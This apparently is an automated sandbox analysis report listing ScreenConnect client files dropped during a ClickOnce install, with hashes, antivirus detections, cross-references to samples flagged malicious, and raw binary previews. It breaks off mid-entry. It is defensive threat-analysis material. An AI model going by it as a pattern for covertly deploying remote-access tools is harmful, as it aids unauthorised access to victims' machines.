                                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Client" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.3.8936" />.. <file name="ScreenConnect.Client.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.3.8936" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependent

                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\manifests\scre..tion_25b0fbb6ef7eb094_0018.0002_none_394ffef6a8000aee.cdf-ms

                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):14608
                                                                                                                                                                                                                                                        Entropy (8bit):5.740513993207141
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:192:s1AT9rI6wOvx58s8oEtYLN8s8oTN2x2QPIlFDLhEDh7BqWoOwj:s1e9rI6wAX9LX9R/QPIBM7YLj
                                                                                                                                                                                                                                                        MD5:890489AF466145A6050725745FF0103B
                                                                                                                                                                                                                                                        SHA1:7F0EB182B0D04E10899E46EE3A0DFA7665CF97C4
                                                                                                                                                                                                                                                        SHA-256:0A4E46E21949EE6138752B89542FA41BD84F566AF0B8E6C691C002FCC0D6CB43
                                                                                                                                                                                                                                                        SHA-512:3DA08E95A29052E54A157321BCC1265FD7F5B624F41E274AFE170294ED8B1BE05301446ADC159E6B2AAE0F30AAFCBEC6EC2F5A576E7CD97DCA118C6934525213
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:PcmH........%..Z.f..$...@.......T...............8...........#........<.g..J.|r,..`PF...}&............Z.....)....E......x...\......=+.p.......I\t.\..>................j.K...6.....U..c...................'-...........-.a.....$...........U...............8........R...........}'.d....j...........K*...!.................`...........................0...................................................(.......@.......P.......T...'...X...................................................4................3......P....7......<8......D8......L8......l8......p8..L...x8.......8.......8.......8.......8.......8..ScreenConnect.Client.manifest%%%V..>...V.[;..jq........2............-........................E......................................4.0.30319%%%Client%%4.0%ScreenConnect Software%%ScreenConnect Client....................................P.......nameScreenConnect.WindowsClient.application%processorArchitecture%%%msilpublicKeyToken%%25b0fbb6ef7eb094version%24.2.3.8936%........................

                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\manifests\scre..tion_25b0fbb6ef7eb094_0018.0002_none_394ffef6a8000aee.manifest

                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (63849), with CRLF line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):118229
                                                                                                                                                                                                                                                        Entropy (8bit):5.585370839513735
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:3072:r7N8cT51/FXvMVNWfCXq9ymfm2o9HuzhJOvP:r6cfiVIBmt8vOvP
                                                                                                                                                                                                                                                        MD5:14CBFC8E1EE96D3503274F68DB7280B9
                                                                                                                                                                                                                                                        SHA1:964378CACB140A0771934E0D4B6EEEB18EE17B99
                                                                                                                                                                                                                                                        SHA-256:490F27B351F34197BEA76860091B7EBAB90F8427BD79C95889D2A12222C5CC00
                                                                                                                                                                                                                                                        SHA-512:410605A4400CA3A5C3F90E998755B5D76013E2314990A51F6F08150E8CC370FB8EC14F3F2B3D180B61322489D7F2672C0AB70F9EC7E4A6CE1566BBAE77A6AE2E
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?><asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xrml="urn:mpeg:mpeg21:2003:01-REL-R-NS" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" xmlns:dsig="http://www.w3.org/2000/09/xmldsig#" xmlns:co.v1="urn:schemas-microsoft-com:clickonce.v1" xmlns:co.v2="urn:schemas-microsoft-com:clickonce.v2">.. <assemblyIdentity name="ScreenConnect.WindowsClient.application" version="24.2.3.8936" publicKeyToken="25b0fbb6ef7eb094" language="neutral" processorArchitecture="msil" xmlns="urn:schemas-microsoft-com:asm.v1" />.. <description asmv2:publisher="ScreenConnect Software" asmv2:product="ScreenConnect Client" xmlns="urn:schemas-microsoft-com:asm.v1" />.. <deployment install="false" trustURLParameters="tru

                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\manifests\scre..vice_4b14c015c87c1ad8_0018.0002_none_0518bf34930ba5ea.cdf-ms

                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):4428
                                                                                                                                                                                                                                                        Entropy (8bit):4.216349786664715
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:96:0AjMeV+Ww8+45utWznn/lpz57y05slTyOmBf:08J1utqcbyr
                                                                                                                                                                                                                                                        MD5:9BF871F6158A7DB421DB4B7E78B301CF
                                                                                                                                                                                                                                                        SHA1:AB71A84595493DB6784E0148F2F5FF8D5304389E
                                                                                                                                                                                                                                                        SHA-256:7D42E545A45AE4D792376B372B9BCDD5CC2C3A7A1F4C8B2EF914A9FA51C87F97
                                                                                                                                                                                                                                                        SHA-512:D92A0DCB4CD830F4C4987F9873472D97079A292CC5DE19DD9FCF783B70B9A1AEB2D3281CE2E67C9B99005109FB8CB035CF274186D5EB38874868632A06E342F7
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:PcmH.........&.HB[.,...T.......T...............8...........+........<.g..J.|r,..`P...............3LD.S.....U..c...................'-........s".I...R.....$...........U.............6...................z..w.....[~31.X....[s.T..<....s".I...R....y..&..d......B(...........E..X.!...O.&r..Vz$......;..'..................."...%...(...0.......0.......0.......0...D...0...t...0................................................... .......0.......8...4...D.......x...P...l...........@...................,.......4.......D...(...L.......t.......|...........(...............................(................... ...(...4.......\.......d...(...|...................(...............L...........0...................................................................................................................................................................................................................................................................................................nameScreenConnect.Cl

                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\manifests\scre..vice_4b14c015c87c1ad8_0018.0002_none_0518bf34930ba5ea.manifest

                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):1632
                                                                                                                                                                                                                                                        Entropy (8bit):5.092740375848212
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:24:JdFYZ8h9onRzgeP0AW+vSkcyMwcbEMwcuMwcVSkcf5bdTo:3FYZ8h9o9gI0AWCHMwTMw3MwGAXTo
                                                                                                                                                                                                                                                        MD5:219DBCD947D7BBDF0BBC78778286B8C7
                                                                                                                                                                                                                                                        SHA1:E95D66F48C130644CE421CBBBFCF3D376FEBAC4E
                                                                                                                                                                                                                                                        SHA-256:C92BB401516771F702CD0986219589CA90E7DE089C8CF4DD825D904985299796
                                                                                                                                                                                                                                                        SHA-512:9E147F80D629AA00C4E0CB8DB708635BA6C14FDE30B8A5574927197352747B43B063060EB4D201C2B4AC984A9F4C84F5F774EB29DE481A0FEE572FB7B0C31F13
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.ClientService" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.3.8936" />.. <file name="ScreenConnect.ClientService.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.3.8936" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Windows" publicKeyToken="4b14c015c87c1ad8" version=

                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.ClientService.exe

                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):95520
                                                                                                                                                                                                                                                        Entropy (8bit):6.504144260093153
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:1536:Sg1s9pgbNBAklbZfe2+zRVdHeDxGXAorrCnBsWBcd6myJkgoU0HMu7axl:jhbNDxZGXfdHrX7rAc6myJkgoU0HVI
                                                                                                                                                                                                                                                        MD5:200A917996F0FC74879076354454473A
                                                                                                                                                                                                                                                        SHA1:15886A7D4385D7EC4F7C8837D7218D46E5B3DD9C
                                                                                                                                                                                                                                                        SHA-256:0B2824097ABE3211AAC5FEDA8DC4D300BA51801D9FBED9EB8330B433A66AC001
                                                                                                                                                                                                                                                        SHA-512:B9133EA853AAF6BB2F5EFD7B65A4559701C37D992D8E9CC79BF181CD8CECF0D436077278DDD87725FB5E59BB2962D0FBC111BF0C7E1C760688D01BA4FA4F003E
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                        Joe Sandbox View:
                                                                                                                                                                                                                                                        • Filename: xrWUzly94Z.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                        • Filename: EPCo9k8NIn.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                        • Filename: X5zNv1VJia.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                        • Filename: AmedVA2n92.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                        • Filename: z7NLXIia8r.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                        • Filename: wbxZk3AvuB.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                        • Filename: 3ckUhKW8W6.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                        • Filename: z7NLXIia8r.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                        • Filename: wbxZk3AvuB.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                        • Filename: 3ckUhKW8W6.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(..qF.qF.qF....qF.....qF....qF.<.B.qF.<.E.qF.<.C.qF....qF.#..qF.qG..qF.2.O.qF.2...qF.2.D.qF.Rich.qF.........................PE..L.....wc...............!.............!............@.................................+.....@.................................p...x....`..P............L.. )...p......`!..p............................ ..@............................................text...:........................... ..`.rdata...f.......h..................@..@.data........@.......,..............@....rsrc...P....`.......6..............@..@.reloc.......p.......<..............@..B........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.WindowsBackstageShell.exe

                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):61216
                                                                                                                                                                                                                                                        Entropy (8bit):6.311801757323114
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:1536:EW/+lo6MOc8IoiKWj8Nv8DtyQ4RE+TC6GAhVby97sxd:ELlo6dcclCyQGGn9G
                                                                                                                                                                                                                                                        MD5:C754141304DE3EBAD8ECEEA033356AD6
                                                                                                                                                                                                                                                        SHA1:6AC5D18F1525878FA83E5A93F606AFC58DC7D949
                                                                                                                                                                                                                                                        SHA-256:B1B8A3AD61C1ECED612C442442CC2CF73E2E4B81ACFC8EDFDB3DDEEBAE1E6D78
                                                                                                                                                                                                                                                        SHA-512:81C3B134A2C7C591607ACAC6F9C7881BF0BC194903339534943D65DF49E904BC7FAEEA2A350A4314E28DB2C913C2183C9D3ECF6CA03EB082F5EA461D1E4A6333
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....P............"...0.................. ........@.. ....................... .......|....@.....................................O....... ............... )..............8............................................ ............... ..H............text........ ...................... ..`.rsrc... ...........................@..@.reloc..............................@..B........................H........S......................x.........................................(....*^.(.......a...%...}....*:.(......}....*:.(......}....*:.(......}....*....0..........(....(....(....(....r...p(....o....(....r...p..~....(....(....r9..p..~....(....(.....g~).....(....rY..p.(....&(.....(....s....( ...s....(!...*...0...........(".....(#.....($....s....%.o%...%.o&...%.o'...%s!...o(...%~....o)...}......(....o*...o+....(,.....@...%..(.....o-....s....}.....{...........s/...o0....s....}..

                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.WindowsBackstageShell.exe.config

                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):266
                                                                                                                                                                                                                                                        Entropy (8bit):4.842791478883622
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                                                                                                                                                        MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                                                                                                                                                        SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                                                                                                                                                        SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                                                                                                                                                        SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>

                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.WindowsClient.exe.config

                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):266
                                                                                                                                                                                                                                                        Entropy (8bit):4.842791478883622
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                                                                                                                                                        MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                                                                                                                                                        SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                                                                                                                                                        SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                                                                                                                                                        SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>

                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.WindowsFileManager.exe

                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):81696
                                                                                                                                                                                                                                                        Entropy (8bit):5.8611828051677515
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:1536:Atygl44gzbJI5kLP+VVVVVVVVVVVVVVVVVVVVVVVVVC7wk7bOxrk:r+kukLd0kv+k
                                                                                                                                                                                                                                                        MD5:66E3A8246447DECC97AB63A3485B8DE4
                                                                                                                                                                                                                                                        SHA1:2630B84AD3328A1E1CAE11CDF1D7CA2AFC5DB607
                                                                                                                                                                                                                                                        SHA-256:04A113517425FA2544367F4D343FB04AEE582E6CF2E387EAA9A92B7303652973
                                                                                                                                                                                                                                                        SHA-512:363BFBD98B5C49CDF7201AA196D1FEA8EAA905EC531E585FB941B246C881390340AB9CA19996564D32A26CADFC46715C48A15A9E2A08E5760F014E65C9220F11
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...z.X..........."...0..@...........^... ...`....@.. .......................`............@..................................^..O....`.................. )...@.......]..8............................................ ............... ..H............text....>... ...@.................. ..`.rsrc........`.......B..............@..@.reloc.......@......................@..B.................^......H....... +..@2..................`]........................................(....*^.(.......;...%...}....*:.(......}....*:.(......}....*:.(......}....*....0..........s>....(....(....(....(....(.....(....(......s....}B....s....}C....~@...%-.&~?.....<...s ...%.@...o...+.....@...s ...o...+......A...s!...o...+}D.......B...s"...o...+.......(#...&......(#...& .... ...........($...&s....t......r...prs..p(%...(&...~>...%-.&...'...s(...%.>.....A...().......(*........(+...o,...(-...t....

                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.WindowsFileManager.exe.config

                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):266
                                                                                                                                                                                                                                                        Entropy (8bit):4.842791478883622
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                                                                                                                                                        MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                                                                                                                                                        SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                                                                                                                                                        SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                                                                                                                                                        SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>

                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..core_4b14c015c87c1ad8_0018.0002_none_53c526ebfd4c427f\ScreenConnect.Core.dll

                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):548352
                                                                                                                                                                                                                                                        Entropy (8bit):6.045519732283216
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:6144:YtkHq9BVYKH062PQHz0k4NbuI2Tt1QsEaVQQUzxmj8/lmQpnGGlsGdmACEhHkG5Y:YNpZZasEbJ0OnGGlNkuMHCzzdU
                                                                                                                                                                                                                                                        MD5:D0B5084C680C798B5340D2E61CA5E06C
                                                                                                                                                                                                                                                        SHA1:C4F4DE6B77589A8D853F565C99DEF5DBFB230725
                                                                                                                                                                                                                                                        SHA-256:D933498CD929C57AAB0C3AF908E0FE617213DD67C13E39B2A1D68B8F21849A7A
                                                                                                                                                                                                                                                        SHA-512:E14E32D981F4926FE80A4C45D5DFCDCDC3B78DC63556FFBFB4DCE61C2818E6AA2FD5BACC5734970BDE017AC3FDCF0E24FABCC68C1C99C98A84095394E46391B5
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...iB............" ..0..V...........p... ........... ....................................@.................................qp..O.......t............................o..8............................................ ............... ..H............text....T... ...V.................. ..`.rsrc...t............X..............@..@.reloc...............\..............@..B.................p......H........B...,..................To........................................{:...*..{;...*V.(<.....}:.....};...*...0..A........u~.......4.,/(=....{:....{:...o>...,.(?....{;....{;...o@...*.*.*. ... )UU.Z(=....{:...oA...X )UU.Z(?....{;...oB...X*...0..b........r...p......%..{:......%q.........-.&.+.......oC....%..{;......%q.........-.&.+.......oC....(D...*..{E...*..{F...*V.(<.....}E.....}F...*.0..A........u........4.,/(=....{E....{E...o>...,.(?....{F....{F...o@...*.*.*. F.b# )UU.

                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..dows_4b14c015c87c1ad8_0018.0002_none_583cfecd399a55af\ScreenConnect.Windows.dll

                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):1721856
                                                                                                                                                                                                                                                        Entropy (8bit):6.638253108372186
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:24576:qGPFFj+Ifz3zvnXj/zXzvAAkGz8mvgtX79S+2bfh+RfmT01krTFiH4SqfKPTsUTM:DPFJkGYYpT0+TFiH7efP
                                                                                                                                                                                                                                                        MD5:F4E602A8A0FD88FF3FFDAC946C21E567
                                                                                                                                                                                                                                                        SHA1:1B9D9F1581F780485A325A35DCD29A16B213591C
                                                                                                                                                                                                                                                        SHA-256:2AB4FB595844C11F27A54402C37197C96FA8E92FCC5D63B43D4810A4891EFBC7
                                                                                                                                                                                                                                                        SHA-512:6DFFC1EF67CC474FC7DCE358A7E3297EBAB4456B88A3A172F0E4BA65C5EE8DD6F67611296DBC8F478B7A3E2ED714E412A26BEF84D19E1B36AD0754BD693CF00B
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0..>...........\... ...`....... ...............................o....@.................................?\..O....`..|............................[..8............................................ ............... ..H............text....<... ...>.................. ..`.rsrc...|....`.......@..............@..@.reloc...............D..............@..B................s\......H.......H..................0....[........................................()...*^.()..........%...}....*:.().....}....*:.().....}....*:.().....}....*..s*...*..s+...*:.(,.....(-...*..{....*"..}....*J.(/........(0...&*:.(,.....(1...*..{2...*"..}2...*.0..(........(3......+.............(0...&..X....i2.*v.(,....s4...}.....s5...}....*v.{.....r...p(...+.....o7....*.0...........o8....+..o9......(...+&.o....-....,..o......*..........."........{..........o:...&.......(.....*....0..L...

                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..ient_4b14c015c87c1ad8_0018.0002_none_b50c000fe630258c\ScreenConnect.WindowsClient.exe

                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):600864
                                                                                                                                                                                                                                                        Entropy (8bit):6.181289241696816
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:12288:CQjDnLlwtFNqDJPeQ66ON3nNFcndYYvavXP:Nmt7KLONdFCdYA+P
                                                                                                                                                                                                                                                        MD5:D95CC7E6F8EC5DDE28E1EFFA58E7AC8D
                                                                                                                                                                                                                                                        SHA1:F288AE509BAE3A0901B727DEBE2CA3153AB77B72
                                                                                                                                                                                                                                                        SHA-256:054260618E077FADCD155C5F37EF3D5745F914ADFE916AE61E8BAFA47F855839
                                                                                                                                                                                                                                                        SHA-512:DC1BF1331B18D0C0E9092A57575A106DFC71CFAE5F9744D6ECACF1F65C3FF8B635737E6F380E7F166DE96E261E79A3C6459DB9D3C8BB524FB7A92DD940847728
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Yara Hits:
